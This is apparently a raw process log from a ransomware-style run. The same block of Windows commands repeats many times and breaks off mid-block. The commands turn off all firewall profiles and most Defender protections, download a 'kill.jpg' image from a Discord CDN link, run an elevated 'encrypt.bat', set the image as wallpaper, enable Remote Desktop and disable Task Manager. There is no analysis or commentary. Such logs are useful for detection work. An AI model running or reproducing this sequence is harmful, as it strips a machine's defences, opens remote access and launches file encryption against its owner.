C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

